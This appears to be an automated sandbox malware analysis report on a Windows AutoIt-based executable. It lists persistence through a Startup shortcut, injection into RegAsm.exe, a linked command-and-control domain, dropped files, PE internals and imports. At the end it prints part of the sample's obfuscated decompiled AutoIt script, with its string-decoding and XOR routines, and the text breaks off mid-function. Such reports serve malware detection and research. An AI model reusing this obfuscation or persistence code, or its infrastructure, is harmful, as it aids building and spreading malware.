Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.50.102.62, 40.91.76.224, 92.122.145.220, 20.82.209.183, 23.55.161.150, 23.55.161.132, 23.55.161.142, 23.55.161.148, 23.55.161.149, 23.55.161.163, 23.55.161.157, 23.55.161.170, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.35.236.56, 23.203.67.116, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, validation-v2.sls.microsoft.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, validation-v2.sls.trafficmanager.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:56:55	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sdchange.lnk
13:57:02	API Interceptor	484x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
megida.hopto.org	vCVJO4xhuE.exe	Get hash	malicious	Browse	0.0.0.0
	SutRc8iT50.exe	Get hash	malicious	Browse	0.0.0.0
	BycT2K3tqw.exe	Get hash	malicious	Browse	0.0.0.0
	NaeJDbDEhv.exe	Get hash	malicious	Browse	0.0.0.0
	mKwRy5zlC1.exe	Get hash	malicious	Browse	0.0.0.0
	0b4KVMtyt2.exe	Get hash	malicious	Browse	0.0.0.0
	rMXtWZE8zC.exe	Get hash	malicious	Browse	0.0.0.0
	zKFX17X1HV.exe	Get hash	malicious	Browse	0.0.0.0
	iIfKHwYD3f.exe	Get hash	malicious	Browse	0.0.0.0
	8T2c71SMRc.exe	Get hash	malicious	Browse	0.0.0.0
	cdu4RCsVw5.exe	Get hash	malicious	Browse	0.0.0.0
	kIRbC6ZYIH.exe	Get hash	malicious	Browse	0.0.0.0
	2gYXJQigWS.exe	Get hash	malicious	Browse	0.0.0.0
	FsYqgk2CFi.exe	Get hash	malicious	Browse	0.0.0.0
	w6OD0DrYr3.exe	Get hash	malicious	Browse	0.0.0.0
	TUtq51OHzM.exe	Get hash	malicious	Browse	0.0.0.0
	9DHL Package Delay Notification 20190614,pdf.exe	Get hash	malicious	Browse	194.5.98.25
	15Orascom Construction Limited Important Inquiry Document,pdf.exe	Get hash	malicious	Browse	194.5.98.25
	30Orascom Construction Company Limited Inquiry document,pdf.exe	Get hash	malicious	Browse	194.5.98.25
	18CY.exe	Get hash	malicious	Browse	213.208.129.198

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:R7S8n:88
MD5:	5DDEC758B77D5B693053413AE49F06FA
SHA1:	102007D870F22E257D4B105971895F5FBA9303FD
SHA-256:	DFF20B05FF3AC595B9698967ED4E7862E19D377412984E30315660C021F11AD6
SHA-512:	50F0DD6357188F1E3406CD9374FF18FB92B4BBDAD37D7DDB9F759DAD639B2C4B7CCB4727C6414D953E51F11D5B89D323E9A025335E203C92AB8E21E495F26C10
Malicious:	true
Reputation:	low
Preview:	.*^.x.H

C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat Download File
Process:	C:\Users\user\Desktop\wIQLBHYbqz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1253984
Entropy (8bit):	7.161677576535402
Encrypted:	false
SSDEEP:	24576:9AHnh+eWsN3skA4RV1Hom2KXMmHaFZyrh9QI/C+EZCBqUIYXmf8MuvWzy:ch+ZkldoPK8YaFZyri7QPIYXLMK
MD5:	F9F1A2B23DF822033EC717757776CBB7
SHA1:	FFEFDCF1616F9A38EEC5EA269B911A070F0FCB06
SHA-256:	E6973E79CEC34C9DA0B10B28C95C28B5BF3F112216042E472CF40B6AF671E257
SHA-512:	99036EEF75098DF9247005DEF6D3F8646AEE382247E8E9558118F31167E4248F8B3EFB79343D09F431FC0672A227974E0DFFEAE92D7D4A23DA0B22AA4E3FB061
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........<....................@.......................................@...@.......@.........................\|........x......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....x.......z...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sdchange.lnk Download File
Process:	C:\Users\user\Desktop\wIQLBHYbqz.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 15 19:56:51 2021, mtime=Wed Sep 15 19:56:51 2021, atime=Wed Sep 15 19:56:51 2021, length=1253984, window=hide
Category:	dropped
Size (bytes):	934
Entropy (8bit):	5.0399705120768425
Encrypted:	false
SSDEEP:	24:8o7bAJazTcb0domePeCVrKvHUeR/huyAH9i6/hAJ1m:8o7bAczQYd9ZCVkHvZsoqeJ1
MD5:	3A151859BF071B8B0A25E8778115EF19
SHA1:	7D6865050E2726091F4FC126267102BF8DCFB0B0
SHA-256:	D32FDF5749E8390DBD04933D2C8B118E3F312101D76ABCFDDA8D13F6D61F4ACF
SHA-512:	03D040B42E8E78E2B70AE1164051F9467FCF9A4E5BFAD0001CF4C70C8EBDFB648B15061D77460B98A3B3DD724AE2D7A7AC62E1FA545C9857165E66F8129FE46F
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....g.4t......4t......4t...`"........................:..DG..Yr?.D..U..k0.&...&........d.!-..Yc6%>.....5t.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N../S.......Y.....................t..A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N../S.......Y....................D...R.o.a.m.i.n.g.....V.1...../S....Gfxv2_0.@....../S../S......$H....................x.}.G.f.x.v.2._.0.....z.2.`"../S.. .RMACTI~1.BAT..^....../S../S......%H.....................Qt.R.M.A.c.t.i.v.a.t.e._.i.s.v...e.x.e...b.a.t.......o...............-.......n..............{.....C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat..-.....\.....\.....\.....\.....\.G.f.x.v.2._.0.\.R.M.A.c.t.i.v.a.t.e._.i.s.v...e.x.e...b.a.t.`.......X.......580913...........!a..%.H.VZAj..."...1........-$..!a..%.H.VZAj..."...1........-$.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1616750530451565
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wIQLBHYbqz.exe
File size:	1253976
MD5:	1312d6ff22dbd8e9e05d1b0d9130439d
SHA1:	913051c8f41e722c522e637bdbdfa563ecfba4ff
SHA256:	543694f8b09a565a88932457d40d16cd85ac3f0b7be9ad322ef9486144379449
SHA512:	d16116efbbec351430dead1cc3c1a9029cb9781075bc7951ec2811c1b18962f3218cc1c308fe6bc7bc0dbdb3366a53926bef1f3bfdf78c236192e9af2890d740
SSDEEP:	24576:9AHnh+eWsN3skA4RV1Hom2KXMmHaFZyrh9QI/C+EZCBqUIYXmf8MuvWzr:ch+ZkldoPK8YaFZyri7QPIYXLMD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	74e8cad0ccd4c4c4

Static PE Info

General
Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5CF61010 [Tue Jun 4 06:30:40 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F702095261Dh
jmp 00007F70209453D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F702094555Ah
cmp edi, eax
jc 00007F70209458BEh
bt dword ptr [004C41FCh], 01h
jnc 00007F7020945559h
rep movsb
jmp 00007F702094586Ch
cmp ecx, 00000080h
jc 00007F7020945724h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7020945560h
bt dword ptr [004BF324h], 01h
jc 00007F7020945A30h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F70209456FDh
test edi, 00000003h
jne 00007F702094570Eh
test esi, 00000003h
jne 00007F70209456EDh
bt edi, 02h
jnc 00007F702094555Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7020945563h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F70209455B5h
bt esi, 03h

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[LNK] VS2013 UPD5 build 40629
[ASM] VS2013 UPD5 build 40629
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x67804	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x130000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	False	0.573560258033	data	6.67524835171	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	False	0.328288185379	data	5.76324400576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	False	0.10175304878	data	1.19638192355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0x67804	0x67a00	False	0.94490255579	data	7.88902486537	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x130000	0x7134	0x7200	False	0.575143914474	data	5.64336658125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc8594	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc86bc	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc87e4	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc890c	0x468	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0xc8d74	0x988	data	English	Great Britain
RT_ICON	0xc96fc	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xca7a4	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	Great Britain
RT_ICON	0xccd4c	0x15e1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain
RT_MENU	0xce330	0x50	data	English	Great Britain
RT_STRING	0xce380	0x15f68	data
RT_STRING	0xe42e8	0x15f68	data
RT_STRING	0xfa250	0x594	data	English	Great Britain
RT_STRING	0xfa7e4	0x68a	data	English	Great Britain
RT_STRING	0xfae70	0x490	data	English	Great Britain
RT_STRING	0xfb300	0x5fc	data	English	Great Britain
RT_STRING	0xfb8fc	0x65c	data	English	Great Britain
RT_STRING	0xfbf58	0x466	data	English	Great Britain
RT_STRING	0xfc3c0	0x158	data	English	Great Britain
RT_RCDATA	0xfc518	0x32bf8	data
RT_GROUP_ICON	0x12f110	0x4c	data	English	Great Britain
RT_GROUP_ICON	0x12f15c	0x14	data	English	Great Britain
RT_GROUP_ICON	0x12f170	0x14	data	English	Great Britain
RT_GROUP_ICON	0x12f184	0x14	data	English	Great Britain
RT_VERSION	0x12f198	0x27c	data	French	France
RT_MANIFEST	0x12f414	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
LegalCopyright	wininit
FileVersion	185.482.48.284
CompanyName	GamePanel
ProductName	adsldpc
ProductVersion	558.451.325.826
FileDescription	browseui
OriginalFilename	RdpSaUacHelper
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
French	France

Static AutoIT Info

General

Code:

LOCAL $EKYCTCNHDZ = EXECUTE LOCAL $OJGVBERKEJBE = $EKYCTCNHDZ ("DllStructGetData" ) LOCAL $YLVQLIDHEJWX = $EKYCTCNHDZ ("BinaryToString" ) $IEHDDOIYHINMPBUCHBHARTDUKILWZQCUVDTRYHUFIM = EXECUTE ("@TempDir" ) $CFJUHMDSDKCZOCVFLYURKIBOKZAHTMIIE = EXECUTE ("@ScriptDir" ) $AVJTMWBNEWJJVDCTUDWDEWCFIKWNLJRYLAMRLSPMDEPITACR = EXECUTE ("@OSVersion" ) $FJVRHISHSSHJEPWQMMUMBIFRUFCKXVFVZNRK = EXECUTE ("@AutoItPID" ) $RPXLQCDPMYWXAMHGBQJLUKGTWUMRCSLUOUUNBYGLQPOG = EXECUTE ("@AutoItExe" ) $BECCJIYOKJQE = EXECUTE ("vLsHMDZkXoUe()" ) $YFYLLVZDUQRC = EXECUTE ("UgPtHQHyLfMO()" ) $TWXPJLDBTLTX = EXECUTE ("vRMOlqyJsqgj()" ) $UBAKYTACSQES = EXECUTE ("opYIFKUKcKeS()" ) $LYDOYURNNHSZ = EXECUTE ("qlqvzSEcZEvG()" ) $GOWQQZFKJDEL = EXECUTE ("nHvvdkwADDWZ()" ) $QJGZOLGPHKUD = EXECUTE ("mthjnHtHyuuu()" ) $FEYVUXLEGFHL = EXECUTE ("GKoJsOxKXkGd()" ) $ZNNZHMCQTOPD = EXECUTE ("WOyaFfSznMVD()" ) $QCJGZATPVQXM = EXECUTE ("AVxcrdFDaNXy()" ) $EQNGFPRNKMDT = EXECUTE ("lRfvyXQfDmpD()" ) $CLTCCKUEQWTC = EXECUTE ("zUQiQWYIEpgw()" ) $DQIFFUXAMLIV = EXECUTE ("rlIPxUZEcExv()" ) $INRXTUXKPWXC = EXECUTE ("eCsyIKarWbOw()" ) $CAIQJRRJDNHO = EXECUTE ("rjSCxWpqpGlt()" ) $QBQADACRHPDC = EXECUTE ("gzefgaQpTilN()" ) $SPAYPUCWZKBI = EXECUTE ("BrOstHgPRzHk()" ) $ROAVRSIHXASO = EXECUTE ("plxmFFUKhkpt()" ) $GODTWHVWYOIN = EXECUTE ("dzmXwpbfDjeK()" ) OPT (BTBXJYMRFGAETPA ("20,44,27,51,9,29,41,40,8,35,30,31" ) , BTBXJYMRFGAETPA ("54" ) ) FUNC BTBXJYMRFGAETPA ($STR ) LOCAL $ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" LOCAL $SPLIT = STRINGSPLIT ($ALPHABET , "" ) LOCAL $STRINGSPLITTED = STRINGSPLIT ($STR , "," ) LOCAL $RESULT FOR $I = "1" TO UBOUND ($STRINGSPLITTED ) - "1" $RESULT &= $SPLIT [$STRINGSPLITTED [$I ] ] NEXT RETURN $RESULT ENDFUNC FUNC FFFWGZEQMC ($PID ) WHILE (1 ) $UBAKYTACSQES (BTBXJYMRFGAETPA ("54,53,53,53,53" ) ) IF $QJGZOLGPHKUD ($PID ) = BTBXJYMRFGAETPA ("53" ) THEN JBBXBRVVWS () ENDIF WEND ENDFUNC FUNC GKOJSOXKXKGD () RETURN EXECUTE (BTBXJYMRFGAETPA ("16,44,41,29,31,45,45,3,38,41,45,31" ) ) ENDFUNC FUNC XOR ($INPUT , $KEY ) LOCAL $RESULT LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA 